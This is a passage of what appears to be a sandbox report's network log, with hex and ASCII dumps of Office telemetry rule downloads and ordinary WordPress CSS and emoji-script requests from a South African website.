                                                                                                                      2024-12-03 07:55:12 UTC8000INData Raw: 64 66 66 65 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 64 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 65 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5b 5c 75 64 63 36 38 5c 75 64 63 36 39 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 31 64 5c 75 32 30 30
                                                                                                                      Data Ascii: dffe\u200d\ud83e\udef2\ud83c[\udffb-\udffd\udfff]|\ud83e\udef1\ud83c\udfff\u200d\ud83e\udef2\ud83c[\udffb-\udffe]|\ud83d\udc68\u200d\u2764\ufe0f\u200d\ud83d\udc68|\ud83d\udc69\u200d\u2764\ufe0f\u200d\ud83d[\udc68\udc69]|\ud83e\uddd1\u200d\ud83e\udd1d\u200
                                                                                                                      2024-12-03 07:55:12 UTC2722INData Raw: 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 2c 61 3d 63 2e 64 6f 63 75 6d 65 6e 74 2c 74 3d 21 31 2c 72 3d 30 2c 6f 3d 30 3c 63 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 54 72 69 64 65 6e 74 2f 37 2e 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 72 65 74 75 72 6e 21 61 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 68 61 73 46 65 61 74 75 72 65 7c 7c 61 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 68 61 73 46 65 61 74 75 72 65 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 53 56 47 31 31 2f 66 65 61 74 75 72 65 23 49 6d 61 67 65 22 2c 22 31 2e 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 69 66 28 21 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 63 2e 74 77 65 6d 6f 6a
                                                                                                                      Data Ascii: MutationObserver,a=c.document,t=!1,r=0,o=0<c.navigator.userAgent.indexOf("Trident/7.0");function i(){return!a.implementation.hasFeature||a.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1")}function s(){if(!t){if(void 0===c.twemoj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      63192.168.2.44982313.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:11 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:11 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 475
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                      ETag: "0x8DC582BB2BE84FD"
                                                                                                                      x-ms-request-id: fdf69e8b-201e-000c-4300-4279c4000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075511Z-174f7845968glpgnhC1EWR7uec00000015w0000000001hvs
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:11 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      64192.168.2.44982213.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:11 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:11 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 425
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                      ETag: "0x8DC582BBA25094F"
                                                                                                                      x-ms-request-id: be2d73de-001e-002b-2f62-4399f2000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075511Z-174f7845968psccphC1EWRuz9s00000015u00000000097u9
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:11 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      65192.168.2.44982413.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:11 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:11 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:11 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 448
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                      ETag: "0x8DC582BB389F49B"
                                                                                                                      x-ms-request-id: 08c5e1cf-601e-0050-20c3-432c9c000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075511Z-174f7845968xlwnmhC1EWR0sv800000015hg000000001t1c
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:11 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      66192.168.2.449826196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC593OUTGET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.7 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:13 UTC284INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:13 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Sat, 20 May 2023 10:50:26 GMT
                                                                                                                      ETag: "1732d-5fc1dce1fe080"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 95021
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:13 UTC7908INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 77 70 2d 62 6c 6f 63 6b 2d 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 76 61 74 61 72 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 7d 2e 77 70 2d 62
                                                                                                                      Data Ascii: @charset "UTF-8";.wp-block-archives-dropdown label{display:block}.wp-block-avatar{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-top:.5em;margin-bottom:1em}.wp-b
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 34 39 34 39 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 29 3a 6e 6f 74 28 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 29 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 74 65 78 74 61 72 65 61 7b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 29 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63
                                                                                                                      Data Ascii: r:1px solid #949494;font-size:1em;font-family:inherit}.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.wp-bloc
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 6e 64 2d 64 69 6d 2d 39 30 3a 6e 6f 74 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 67 72 61 64 69 65 6e 74 29 3a 62 65 66 6f 72 65 7b 6f 70 61 63 69 74 79 3a 2e 39 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 31 30 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 64 69 6d 2d 31 30 30 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2c 2e 77 70 2d
                                                                                                                      Data Ascii: nd-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 2d 68 65 69 67 68 74 3a 6e 6f 6e 65 3b 2d 6f 2d 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 3b 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 70 61 72 61 6c 6c 61 78 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 70 61 72 61 6c 6c 61 78 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6d 61 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 61 73 2d 70 61 72 61 6c 6c 61 78 2c 76 69 64 65 6f 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 76 69 64 65 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 2e 68 61 73 2d 70 61 72 61 6c 6c 61 78 7b 62
                                                                                                                      Data Ascii: -height:none;-o-object-fit:cover;object-fit:cover;outline:none;border:none;box-shadow:none}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{b
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 31 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 74 65 6d 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 67 72 69 64 3a 6e 6f 74 28 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 29 2e 63 6f 6c 75 6d 6e 73 2d 33 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 69 6d 61 67 65 2c 2e 62
                                                                                                                      Data Ascii: .has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{width:100%;margin-right:0}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.b
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 3a 6e 6f 74 28 2e 69 73 2d 63 72 6f 70 70 65 64 29 20 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 3a 6e 6f 74 28 23 69 6e 64 69 76 69 64 75 61 6c 2d 69 6d 61 67 65 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65 73 2e 69 73 2d 63 72 6f 70 70 65 64 20 66 69 67 75 72 65 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 3a 6e 6f 74 28 23 69 6e 64 69 76 69 64 75 61 6c 2d 69 6d 61 67 65 29 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 69 6e 68 65 72 69 74 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 67 61 6c 6c 65 72 79 2e 68 61 73 2d 6e 65 73 74 65 64 2d 69 6d 61 67 65
                                                                                                                      Data Ascii: s-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){margin-top:0;margin-bottom:auto}.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){align-self:inherit}.wp-block-gallery.has-nested-image
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 2a 2f 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 0a 20 20 2f 2a 21 72 74 6c 3a 65 6e 64 3a 69 67 6e 6f 72 65 2a 2f 64 69 73 70 6c 61 79 3a 67 72 69 64 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 35 30 25 20 31 66 72 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 72 6f 77 73 3a 61 75 74 6f 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 2e 68 61 73 2d 6d 65 64 69 61 2d 6f 6e 2d 74 68 65 2d 72 69 67 68 74 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 31 66 72 20 35 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6d 65 64 69 61 2d 74 65 78 74 2e 69 73 2d 76 65 72 74 69 63 61 6c 6c 79 2d 61 6c 69 67 6e 65 64 2d 74 6f 70 20 2e 77 70 2d 62 6c 6f
                                                                                                                      Data Ascii: */direction:ltr; /*!rtl:end:ignore*/display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto;box-sizing:border-box}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top .wp-blo
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 64 69 61 6c 6f 67 7b 67 61 70 3a 69 6e 68 65 72 69 74 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 69 74 65 6d 20 61 3a 6e 6f 74 28 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 29 29 2c 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e
                                                                                                                      Data Ascii: sive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-backgroun
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 28 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 6d 65 6e 75 2d 6f 70 65 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 74 6f 67 67 6c 65 5f 62 75 74 74 6f 6e 5f 6c 61 62 65 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70 6f 6e 73 69 76 65 2d 63 6f 6e 74 61 69 6e 65 72 2d 63 6c 6f 73 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 5f 5f 72 65 73 70
                                                                                                                      Data Ascii: (.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff;color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__resp
                                                                                                                      2024-12-03 07:55:14 UTC8000INData Raw: 72 61 70 3a 77 72 61 70 3b 67 61 70 3a 31 2e 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 20 6c 69 7b 6d 61 72 67 69 6e 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 6f 6c 75 6d 6e 73 2d 32 3e 6c 69 7b 77 69 64 74 68 3a 63 61 6c 63 28 35 30 25 20 2d 20 2e 36 32 35 65 6d 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 66 6c 65 78 2d 63 6f 6e 74 61 69 6e 65 72 2e 69 73 2d 66 6c
                                                                                                                      Data Ascii: rap:wrap;gap:1.25em}.wp-block-post-template.is-flex-container li{margin:0;width:100%}@media (min-width:600px){.wp-block-post-template.is-flex-container.is-flex-container.columns-2>li{width:calc(50% - .625em)}.wp-block-post-template.is-flex-container.is-fl


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      67192.168.2.449825196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:13 UTC579OUTGET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
